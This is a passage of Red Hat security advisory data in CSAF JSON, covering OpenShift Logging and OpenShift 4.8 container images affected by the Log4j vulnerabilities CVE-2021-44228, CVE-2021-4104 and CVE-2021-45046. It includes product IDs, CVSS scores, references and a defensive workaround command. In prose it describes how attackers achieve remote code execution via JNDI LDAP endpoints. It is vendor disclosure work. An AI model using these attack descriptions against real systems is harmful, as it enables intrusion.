"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-rhel8-operator@sha256:ee5026614e766aaaf52ba6437577c94235e2021d8d82b13d90960220d27d8ff8_s390x", "8Base-OSE-LOGGING-5.3:openshift-logging/eventrouter-rhel8@sha256:959a047204a93d8d6460fafa7616ff154e8feb08a7c05d6867f99ec1a87ebf73_s390x", "8Base-OSE-LOGGING-5.3:openshift-logging/eventrouter-rhel8@sha256:9f5f2df7b88610ec8ca085d2c48d527f3863b8c7e865786090df3040a51bda69_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/eventrouter-rhel8@sha256:c4480951503ca7072e946b1fde63bc7ef45eb60c7d62a8a2d204e972884266be_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/fluentd-rhel8@sha256:8e6e030a092c94af29c0fc50f79abcfd058aee14d929dfaea457bb39891c57fe_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/fluentd-rhel8@sha256:e460881db1614b5fabbd938fa674f82e90524beb54ae2619acaf50665785892e_s390x", 
"8Base-OSE-LOGGING-5.3:openshift-logging/fluentd-rhel8@sha256:e5bab509f084458d27d3bb32fd82132ce03523bbec45ce4aa8f68837c0cfc2db_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/kibana6-rhel8@sha256:0599610c8e53b621fa1a6079cdc636477b38d5d1747c7221d67dda1b4a362258_s390x", "8Base-OSE-LOGGING-5.3:openshift-logging/kibana6-rhel8@sha256:588c93bed798115647759a8fa778fe5c0f4110ff31f863718453105d04c0a6f8_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/kibana6-rhel8@sha256:ba0909befb1bcc75437a1b389032e8cf9526692a5ee2ad610df0acd870aba9f0_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/log-file-metric-exporter-rhel8@sha256:41f878aefc6559950120527e2ae422a79c3d768b00885a5426fcae655aaae8b7_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/log-file-metric-exporter-rhel8@sha256:542269634b1bf21cb986f1618161b7b50f7871d61286e43d2b9acf39abf745f0_s390x", "8Base-OSE-LOGGING-5.3:openshift-logging/log-file-metric-exporter-rhel8@sha256:daaf25c751e4562a4a06d4e30f33db2b01a2557e03053afc2dc4a85377ab4dc5_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/logging-curator5-rhel8@sha256:5eed6d7086407a59ff8a0750b64fc9b245dd12551db404bc13b9a4cd35a60c8c_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/logging-curator5-rhel8@sha256:9abe7a5c17765cce39f514185e81d19045370098f5cf44c444f401324c527c78_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/logging-curator5-rhel8@sha256:cd0808c73ea0fb52b679800fd90641578d0788cb0cb63419b2c6c8d6c385da7d_s390x" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-45046" }, { "category": "external", "summary": "RHBZ#2032580", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2032580" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-45046", "url": "https://www.cve.org/CVERecord?id=CVE-2021-45046" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-45046", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-45046" }, { "category": 
"external", "summary": "https://access.redhat.com/security/cve/CVE-2021-44228", "url": "https://access.redhat.com/security/cve/CVE-2021-44228" }, { "category": "external", "summary": "https://logging.apache.org/log4j/2.x/security.html", "url": "https://logging.apache.org/log4j/2.x/security.html" }, { "category": "external", "summary": "https://www.openwall.com/lists/oss-security/2021/12/14/4", "url": "https://www.openwall.com/lists/oss-security/2021/12/14/4" }, { "category": "external", "summary": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog" } ], "release_date": "2021-12-14T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-12-14T19:37:00+00:00", "details": "For OpenShift Container Platform 4.9 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this errata update:\n\nhttps://docs.openshift.com/container-platform/4.9/release_notes/ocp-4-9-release-notes.html\n\nFor Red Hat OpenShift Logging 5.3, see the following instructions to apply this update:\n\nhttps://docs.openshift.com/container-platform/4.9/logging/cluster-logging-upgrading.html", "product_ids": [ "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch6-rhel8@sha256:458c0ecce2582cdaad4b1a179ba7cf22a3831fab833e8b38b6001662cef088d9_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch6-rhel8@sha256:55fb246ff597b28fff584042a6dd86f3b0de83e1271e151aeb7836e1c127f08e_s390x", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch6-rhel8@sha256:cbfac57572671eb995342bfd97e2671b60434ea688a759d05c61176ec4c6e49c_ppc64le" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:5129" }, { "category": "workaround", "details": "For Log4j versions up to and including 2.15.0, this issue can be mitigated by removing the JndiLookup class from the classpath 
(example: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class).", "product_ids": [ "8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-operator-bundle@sha256:90c3bac2bd24cf79249202fc7e7124c602fabb929147bcb5b98564a601b73b05_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-rhel8-operator@sha256:06ef75fc95f01c81ff8effe58060b0c7eada7436a4657087af7dcf34779b78a9_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-rhel8-operator@sha256:a8c9d81be0f59bf60bcdc03584d8093812a8552cb4e5f2926ae8474e41b193b2_s390x", "8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-rhel8-operator@sha256:d16e91e1aeaac45aa51b7f2b0ebe548faa74b141e644e964f94c8ae4b5adc338_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-operator-bundle@sha256:f9eac45d398c5772be52b65e2d6e0bb857a60a4e0f4c789e5c72473855ba2b41_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-proxy-rhel8@sha256:ab6b5992f1718a79b26cab831a3f96c46ac2354e34d7488576830e2e5e5f949c_s390x", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-proxy-rhel8@sha256:e6d806d2223dc344244469a89430d9e60d5d4310e6ed626a6d6b0dfe5d191aa5_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-proxy-rhel8@sha256:fb217034ad478016ece30afe0f892f407e0b5f8e7931962a1376310f87bb6e08_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-rhel8-operator@sha256:75cfb6204d4d74460451dbc0d3f046235f3f00261f5124e4c2616e6ef17e76ca_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-rhel8-operator@sha256:aa4897baa35b4d3c5d2f1b64ecc384bfd0088233da29b50da562622a01da71cd_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-rhel8-operator@sha256:ee5026614e766aaaf52ba6437577c94235e2021d8d82b13d90960220d27d8ff8_s390x", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch6-rhel8@sha256:458c0ecce2582cdaad4b1a179ba7cf22a3831fab833e8b38b6001662cef088d9_amd64", 
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch6-rhel8@sha256:55fb246ff597b28fff584042a6dd86f3b0de83e1271e151aeb7836e1c127f08e_s390x", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch6-rhel8@sha256:cbfac57572671eb995342bfd97e2671b60434ea688a759d05c61176ec4c6e49c_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/eventrouter-rhel8@sha256:959a047204a93d8d6460fafa7616ff154e8feb08a7c05d6867f99ec1a87ebf73_s390x", "8Base-OSE-LOGGING-5.3:openshift-logging/eventrouter-rhel8@sha256:9f5f2df7b88610ec8ca085d2c48d527f3863b8c7e865786090df3040a51bda69_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/eventrouter-rhel8@sha256:c4480951503ca7072e946b1fde63bc7ef45eb60c7d62a8a2d204e972884266be_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/fluentd-rhel8@sha256:8e6e030a092c94af29c0fc50f79abcfd058aee14d929dfaea457bb39891c57fe_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/fluentd-rhel8@sha256:e460881db1614b5fabbd938fa674f82e90524beb54ae2619acaf50665785892e_s390x", "8Base-OSE-LOGGING-5.3:openshift-logging/fluentd-rhel8@sha256:e5bab509f084458d27d3bb32fd82132ce03523bbec45ce4aa8f68837c0cfc2db_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/kibana6-rhel8@sha256:0599610c8e53b621fa1a6079cdc636477b38d5d1747c7221d67dda1b4a362258_s390x", "8Base-OSE-LOGGING-5.3:openshift-logging/kibana6-rhel8@sha256:588c93bed798115647759a8fa778fe5c0f4110ff31f863718453105d04c0a6f8_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/kibana6-rhel8@sha256:ba0909befb1bcc75437a1b389032e8cf9526692a5ee2ad610df0acd870aba9f0_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/log-file-metric-exporter-rhel8@sha256:41f878aefc6559950120527e2ae422a79c3d768b00885a5426fcae655aaae8b7_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/log-file-metric-exporter-rhel8@sha256:542269634b1bf21cb986f1618161b7b50f7871d61286e43d2b9acf39abf745f0_s390x", "8Base-OSE-LOGGING-5.3:openshift-logging/log-file-metric-exporter-rhel8@sha256:daaf25c751e4562a4a06d4e30f33db2b01a2557e03053afc2dc4a85377ab4dc5_amd64", 
"8Base-OSE-LOGGING-5.3:openshift-logging/logging-curator5-rhel8@sha256:5eed6d7086407a59ff8a0750b64fc9b245dd12551db404bc13b9a4cd35a60c8c_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/logging-curator5-rhel8@sha256:9abe7a5c17765cce39f514185e81d19045370098f5cf44c444f401324c527c78_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/logging-curator5-rhel8@sha256:cd0808c73ea0fb52b679800fd90641578d0788cb0cb63419b2c6c8d6c385da7d_s390x" ] } ], "scores": [ { "cvss_v3": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "products": [ "8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-operator-bundle@sha256:90c3bac2bd24cf79249202fc7e7124c602fabb929147bcb5b98564a601b73b05_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-rhel8-operator@sha256:06ef75fc95f01c81ff8effe58060b0c7eada7436a4657087af7dcf34779b78a9_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-rhel8-operator@sha256:a8c9d81be0f59bf60bcdc03584d8093812a8552cb4e5f2926ae8474e41b193b2_s390x", "8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-rhel8-operator@sha256:d16e91e1aeaac45aa51b7f2b0ebe548faa74b141e644e964f94c8ae4b5adc338_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-operator-bundle@sha256:f9eac45d398c5772be52b65e2d6e0bb857a60a4e0f4c789e5c72473855ba2b41_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-proxy-rhel8@sha256:ab6b5992f1718a79b26cab831a3f96c46ac2354e34d7488576830e2e5e5f949c_s390x", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-proxy-rhel8@sha256:e6d806d2223dc344244469a89430d9e60d5d4310e6ed626a6d6b0dfe5d191aa5_amd64", 
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-proxy-rhel8@sha256:fb217034ad478016ece30afe0f892f407e0b5f8e7931962a1376310f87bb6e08_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-rhel8-operator@sha256:75cfb6204d4d74460451dbc0d3f046235f3f00261f5124e4c2616e6ef17e76ca_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-rhel8-operator@sha256:aa4897baa35b4d3c5d2f1b64ecc384bfd0088233da29b50da562622a01da71cd_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-rhel8-operator@sha256:ee5026614e766aaaf52ba6437577c94235e2021d8d82b13d90960220d27d8ff8_s390x", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch6-rhel8@sha256:458c0ecce2582cdaad4b1a179ba7cf22a3831fab833e8b38b6001662cef088d9_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch6-rhel8@sha256:55fb246ff597b28fff584042a6dd86f3b0de83e1271e151aeb7836e1c127f08e_s390x", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch6-rhel8@sha256:cbfac57572671eb995342bfd97e2671b60434ea688a759d05c61176ec4c6e49c_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/eventrouter-rhel8@sha256:959a047204a93d8d6460fafa7616ff154e8feb08a7c05d6867f99ec1a87ebf73_s390x", "8Base-OSE-LOGGING-5.3:openshift-logging/eventrouter-rhel8@sha256:9f5f2df7b88610ec8ca085d2c48d527f3863b8c7e865786090df3040a51bda69_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/eventrouter-rhel8@sha256:c4480951503ca7072e946b1fde63bc7ef45eb60c7d62a8a2d204e972884266be_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/fluentd-rhel8@sha256:8e6e030a092c94af29c0fc50f79abcfd058aee14d929dfaea457bb39891c57fe_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/fluentd-rhel8@sha256:e460881db1614b5fabbd938fa674f82e90524beb54ae2619acaf50665785892e_s390x", "8Base-OSE-LOGGING-5.3:openshift-logging/fluentd-rhel8@sha256:e5bab509f084458d27d3bb32fd82132ce03523bbec45ce4aa8f68837c0cfc2db_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/kibana6-rhel8@sha256:0599610c8e53b621fa1a6079cdc636477b38d5d1747c7221d67dda1b4a362258_s390x", 
"8Base-OSE-LOGGING-5.3:openshift-logging/kibana6-rhel8@sha256:588c93bed798115647759a8fa778fe5c0f4110ff31f863718453105d04c0a6f8_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/kibana6-rhel8@sha256:ba0909befb1bcc75437a1b389032e8cf9526692a5ee2ad610df0acd870aba9f0_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/log-file-metric-exporter-rhel8@sha256:41f878aefc6559950120527e2ae422a79c3d768b00885a5426fcae655aaae8b7_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/log-file-metric-exporter-rhel8@sha256:542269634b1bf21cb986f1618161b7b50f7871d61286e43d2b9acf39abf745f0_s390x", "8Base-OSE-LOGGING-5.3:openshift-logging/log-file-metric-exporter-rhel8@sha256:daaf25c751e4562a4a06d4e30f33db2b01a2557e03053afc2dc4a85377ab4dc5_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/logging-curator5-rhel8@sha256:5eed6d7086407a59ff8a0750b64fc9b245dd12551db404bc13b9a4cd35a60c8c_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/logging-curator5-rhel8@sha256:9abe7a5c17765cce39f514185e81d19045370098f5cf44c444f401324c527c78_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/logging-curator5-rhel8@sha256:cd0808c73ea0fb52b679800fd90641578d0788cb0cb63419b2c6c8d6c385da7d_s390x" ] } ], "threats": [ { "category": "exploit_status", "date": "2023-05-01T00:00:00+00:00", "details": "CISA: https://www.cisa.gov/known-exploited-vulnerabilities-catalog" }, { "category": "impact", "details": "Moderate" } ], "title": "log4j-core: DoS in log4j 2.x with thread context message pattern and context lookup pattern (incomplete fix for CVE-2021-44228)" } ] }
rhsa-2021_5148
Vulnerability from csaf_redhat
Notes
{ "document": { "aggregate_severity": { "namespace": "https://access.redhat.com/security/updates/classification/", "text": "Critical" }, "category": "csaf_security_advisory", "csaf_version": "2.0", "distribution": { "text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.", "tlp": { "label": "WHITE", "url": "https://www.first.org/tlp/" } }, "lang": "en", "notes": [ { "category": "summary", "text": "Red Hat OpenShift Container Platform release 4.8.24 is now available with\nupdates to packages and images that fix several bugs and add enhancements.\n\nRed Hat Product Security has rated this update as having a security impact\nof Critical. A Common Vulnerability Scoring System (CVSS) base score, which\ngives a detailed severity rating, is available for each vulnerability from\nthe CVE link(s) in the References section.", "title": "Topic" }, { "category": "general", "text": "Red Hat OpenShift Container Platform is Red Hat\u0027s cloud computing\nKubernetes application platform solution designed for on-premise or private\ncloud deployments.\n\nSecurity Fix(es):\n\n* log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value (CVE-2021-44228)\n* log4j: Remote code execution in Log4j 1.x when application is configured to use JMSAppender (CVE-2021-4104)\n* log4j-core: DoS in log4j 2.x with thread context message pattern and context lookup pattern (incomplete fix for CVE-2021-44228) (CVE-2021-45046)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "title": "Details" }, { "category": "legal_disclaimer", "text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. 
and provide a link to the original.", "title": "Terms of Use" } ], "publisher": { "category": "vendor", "contact_details": "https://access.redhat.com/security/team/contact/", "issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.", "name": "Red Hat Product Security", "namespace": "https://www.redhat.com" }, "references": [ { "category": "self", "summary": "https://access.redhat.com/errata/RHSA-2021:5148", "url": "https://access.redhat.com/errata/RHSA-2021:5148" }, { "category": "external", "summary": "https://access.redhat.com/security/updates/classification/#critical", "url": "https://access.redhat.com/security/updates/classification/#critical" }, { "category": "external", "summary": "https://access.redhat.com/security/vulnerabilities/RHSB-2021-009", "url": "https://access.redhat.com/security/vulnerabilities/RHSB-2021-009" }, { "category": "external", "summary": "2030932", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2030932" }, { "category": "external", "summary": "2031667", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2031667" }, { "category": "external", "summary": "2032580", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2032580" }, { "category": "self", "summary": "Canonical URL", "url": "https://security.access.redhat.com/data/csaf/v2/advisories/2021/rhsa-2021_5148.json" } ], "title": "Red Hat Security Advisory: OpenShift Container Platform 4.8.24 extras security update", "tracking": { "current_release_date": "2024-12-12T01:19:09+00:00", "generator": { "date": "2024-12-12T01:19:09+00:00", "engine": { "name": "Red Hat SDEngine", "version": "4.2.3" } }, "id": "RHSA-2021:5148", "initial_release_date": "2021-12-15T20:09:32+00:00", "revision_history": [ { "date": "2021-12-15T20:09:32+00:00", "number": "1", "summary": "Initial version" }, { "date": "2021-12-16T16:08:07+00:00", "number": "2", "summary": "Last updated version" }, { "date": "2024-12-12T01:19:09+00:00", 
"number": "3", "summary": "Last generated version" } ], "status": "final", "version": "3" } }, "product_tree": { "branches": [ { "branches": [ { "branches": [ { "category": "product_name", "name": "Red Hat OpenShift Container Platform 4.8", "product": { "name": "Red Hat OpenShift Container Platform 4.8", "product_id": "8Base-RHOSE-4.8", "product_identification_helper": { "cpe": "cpe:/a:redhat:openshift:4.8::el8" } } } ], "category": "product_family", "name": "Red Hat OpenShift Enterprise" }, { "branches": [ { "category": "product_version", "name": "openshift4/ose-metering-hadoop@sha256:50ecba62addb91627e4adad209f95fb910cc16584a1437764e1585430fec30a1_amd64", "product": { "name": "openshift4/ose-metering-hadoop@sha256:50ecba62addb91627e4adad209f95fb910cc16584a1437764e1585430fec30a1_amd64", "product_id": "openshift4/ose-metering-hadoop@sha256:50ecba62addb91627e4adad209f95fb910cc16584a1437764e1585430fec30a1_amd64", "product_identification_helper": { "purl": "pkg:oci/ose-metering-hadoop@sha256:50ecba62addb91627e4adad209f95fb910cc16584a1437764e1585430fec30a1?arch=amd64\u0026repository_url=registry.redhat.io/openshift4/ose-metering-hadoop\u0026tag=v4.8.0-202112150431.p0.gebd9cb4.assembly.art3599" } } }, { "category": "product_version", "name": "openshift4/ose-metering-ansible-operator@sha256:d0d3215ab63ee9893806eedf23fbb2b2237683fbe9c20138b1450f89a231092f_amd64", "product": { "name": "openshift4/ose-metering-ansible-operator@sha256:d0d3215ab63ee9893806eedf23fbb2b2237683fbe9c20138b1450f89a231092f_amd64", "product_id": "openshift4/ose-metering-ansible-operator@sha256:d0d3215ab63ee9893806eedf23fbb2b2237683fbe9c20138b1450f89a231092f_amd64", "product_identification_helper": { "purl": "pkg:oci/ose-metering-ansible-operator@sha256:d0d3215ab63ee9893806eedf23fbb2b2237683fbe9c20138b1450f89a231092f?arch=amd64\u0026repository_url=registry.redhat.io/openshift4/ose-metering-ansible-operator\u0026tag=v4.8.0-202112150431.p0.g0d7ecfb.assembly.art3599" } } }, { "category": 
"product_version", "name": "openshift4/ose-metering-ansible-operator-bundle@sha256:5cc4e959806f4e9cd47b5d8a505b8c6c86775632aee35908a0928bfeede818ad_amd64", "product": { "name": "openshift4/ose-metering-ansible-operator-bundle@sha256:5cc4e959806f4e9cd47b5d8a505b8c6c86775632aee35908a0928bfeede818ad_amd64", "product_id": "openshift4/ose-metering-ansible-operator-bundle@sha256:5cc4e959806f4e9cd47b5d8a505b8c6c86775632aee35908a0928bfeede818ad_amd64", "product_identification_helper": { "purl": "pkg:oci/ose-metering-ansible-operator-bundle@sha256:5cc4e959806f4e9cd47b5d8a505b8c6c86775632aee35908a0928bfeede818ad?arch=amd64\u0026repository_url=registry.redhat.io/openshift4/ose-metering-ansible-operator-bundle\u0026tag=v4.8.0.202112150431.p0.g0d7ecfb.assembly.art3599-1" } } }, { "category": "product_version", "name": "openshift4/ose-metering-presto@sha256:2c449bb93534c6dc17961624ff67bd9e7ef07b5799367a4e0467f8dcadeaf35f_amd64", "product": { "name": "openshift4/ose-metering-presto@sha256:2c449bb93534c6dc17961624ff67bd9e7ef07b5799367a4e0467f8dcadeaf35f_amd64", "product_id": "openshift4/ose-metering-presto@sha256:2c449bb93534c6dc17961624ff67bd9e7ef07b5799367a4e0467f8dcadeaf35f_amd64", "product_identification_helper": { "purl": "pkg:oci/ose-metering-presto@sha256:2c449bb93534c6dc17961624ff67bd9e7ef07b5799367a4e0467f8dcadeaf35f?arch=amd64\u0026repository_url=registry.redhat.io/openshift4/ose-metering-presto\u0026tag=v4.8.0-202112150431.p0.g4b934ae.assembly.art3599" } } } ], "category": "architecture", "name": "amd64" } ], "category": "vendor", "name": "Red Hat" } ], "relationships": [ { "category": "default_component_of", "full_product_name": { "name": "openshift4/ose-metering-ansible-operator-bundle@sha256:5cc4e959806f4e9cd47b5d8a505b8c6c86775632aee35908a0928bfeede818ad_amd64 as a component of Red Hat OpenShift Container Platform 4.8", "product_id": 
"8Base-RHOSE-4.8:openshift4/ose-metering-ansible-operator-bundle@sha256:5cc4e959806f4e9cd47b5d8a505b8c6c86775632aee35908a0928bfeede818ad_amd64" }, "product_reference": "openshift4/ose-metering-ansible-operator-bundle@sha256:5cc4e959806f4e9cd47b5d8a505b8c6c86775632aee35908a0928bfeede818ad_amd64", "relates_to_product_reference": "8Base-RHOSE-4.8" }, { "category": "default_component_of", "full_product_name": { "name": "openshift4/ose-metering-ansible-operator@sha256:d0d3215ab63ee9893806eedf23fbb2b2237683fbe9c20138b1450f89a231092f_amd64 as a component of Red Hat OpenShift Container Platform 4.8", "product_id": "8Base-RHOSE-4.8:openshift4/ose-metering-ansible-operator@sha256:d0d3215ab63ee9893806eedf23fbb2b2237683fbe9c20138b1450f89a231092f_amd64" }, "product_reference": "openshift4/ose-metering-ansible-operator@sha256:d0d3215ab63ee9893806eedf23fbb2b2237683fbe9c20138b1450f89a231092f_amd64", "relates_to_product_reference": "8Base-RHOSE-4.8" }, { "category": "default_component_of", "full_product_name": { "name": "openshift4/ose-metering-hadoop@sha256:50ecba62addb91627e4adad209f95fb910cc16584a1437764e1585430fec30a1_amd64 as a component of Red Hat OpenShift Container Platform 4.8", "product_id": "8Base-RHOSE-4.8:openshift4/ose-metering-hadoop@sha256:50ecba62addb91627e4adad209f95fb910cc16584a1437764e1585430fec30a1_amd64" }, "product_reference": "openshift4/ose-metering-hadoop@sha256:50ecba62addb91627e4adad209f95fb910cc16584a1437764e1585430fec30a1_amd64", "relates_to_product_reference": "8Base-RHOSE-4.8" }, { "category": "default_component_of", "full_product_name": { "name": "openshift4/ose-metering-presto@sha256:2c449bb93534c6dc17961624ff67bd9e7ef07b5799367a4e0467f8dcadeaf35f_amd64 as a component of Red Hat OpenShift Container Platform 4.8", "product_id": "8Base-RHOSE-4.8:openshift4/ose-metering-presto@sha256:2c449bb93534c6dc17961624ff67bd9e7ef07b5799367a4e0467f8dcadeaf35f_amd64" }, "product_reference": 
"openshift4/ose-metering-presto@sha256:2c449bb93534c6dc17961624ff67bd9e7ef07b5799367a4e0467f8dcadeaf35f_amd64", "relates_to_product_reference": "8Base-RHOSE-4.8" } ] }, "vulnerabilities": [ { "cve": "CVE-2021-4104", "cwe": { "id": "CWE-20", "name": "Improper Input Validation" }, "discovery_date": "2021-12-13T00:00:00+00:00", "flags": [ { "label": "vulnerable_code_not_present", "product_ids": [ "8Base-RHOSE-4.8:openshift4/ose-metering-ansible-operator-bundle@sha256:5cc4e959806f4e9cd47b5d8a505b8c6c86775632aee35908a0928bfeede818ad_amd64", "8Base-RHOSE-4.8:openshift4/ose-metering-ansible-operator@sha256:d0d3215ab63ee9893806eedf23fbb2b2237683fbe9c20138b1450f89a231092f_amd64" ] } ], "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "2031667" } ], "notes": [ { "category": "description", "text": "A flaw was found in the Java logging library Apache Log4j in version 1.x. JMSAppender in Log4j 1.x is vulnerable to deserialization of untrusted data. This allows a remote attacker to execute code on the server if the deployed application is configured to use JMSAppender and to the attacker\u0027s JNDI LDAP endpoint.", "title": "Vulnerability description" }, { "category": "summary", "text": "log4j: Remote code execution in Log4j 1.x when application is configured to use JMSAppender", "title": "Vulnerability summary" }, { "category": "other", "text": "Based on the conditions to be exploitable (see details below), the risk is much lower than Log4j 2.x and Red Hat has assessed this to be Moderate severity. This flaw has been filed for Log4j 1.x, and the corresponding flaw information for Log4j 2.x is available at: https://access.redhat.com/security/cve/CVE-2021-44228\n\nNote this flaw ONLY affects applications which are specifically configured to use JMSAppender, which is not the default, or when the attacker has write access to the Log4j configuration for adding JMSAppender to the attacker\u0027s JNDI LDAP endpoint. 
\n\nIf the Log4j configuration is set TopicBindingName or TopicConnectionFactoryBindingName configurations allowing JMSAppender to perform JNDI requests that result in remote code execution in a similar fashion to CVE-2021-44228 Log4j 2.x, Log4j 1.x is vulnerable. However, the attack vector is reduced as it depends on having write access, which is not a standard configuration rather than untrusted user input. These are sufficient factors beyond the attacker\u0027s control.\n\nThe tomcat package shipped with Red Hat Enterprise Linux does not include log4j but it does include a default configuration for log4j, log4j.properties, which could be used with tomcat if users choose to install and configure the library. The JMSAppender is not enabled by default, and the permissions of the file can only be modified as root.\n\nRed Hat Virtualization ships log4j12-1.2.17, but it is used and configured in a way which makes this flaw not possible to exploit. Therefore impact is rated Low.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "8Base-RHOSE-4.8:openshift4/ose-metering-hadoop@sha256:50ecba62addb91627e4adad209f95fb910cc16584a1437764e1585430fec30a1_amd64", "8Base-RHOSE-4.8:openshift4/ose-metering-presto@sha256:2c449bb93534c6dc17961624ff67bd9e7ef07b5799367a4e0467f8dcadeaf35f_amd64" ], "known_not_affected": [ "8Base-RHOSE-4.8:openshift4/ose-metering-ansible-operator-bundle@sha256:5cc4e959806f4e9cd47b5d8a505b8c6c86775632aee35908a0928bfeede818ad_amd64", "8Base-RHOSE-4.8:openshift4/ose-metering-ansible-operator@sha256:d0d3215ab63ee9893806eedf23fbb2b2237683fbe9c20138b1450f89a231092f_amd64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": 
"https://access.redhat.com/security/cve/CVE-2021-4104" }, { "category": "external", "summary": "RHBZ#2031667", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2031667" }, { "category": "external", "summary": "RHSB-2021-009", "url": "https://access.redhat.com/security/vulnerabilities/RHSB-2021-009" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-4104", "url": "https://www.cve.org/CVERecord?id=CVE-2021-4104" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-4104", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-4104" }, { "category": "external", "summary": "https://github.com/apache/logging-log4j2/pull/608#issuecomment-990494126", "url": "https://github.com/apache/logging-log4j2/pull/608#issuecomment-990494126" }, { "category": "external", "summary": "https://github.com/apache/logging-log4j2/pull/608#issuecomment-991723301", "url": "https://github.com/apache/logging-log4j2/pull/608#issuecomment-991723301" }, { "category": 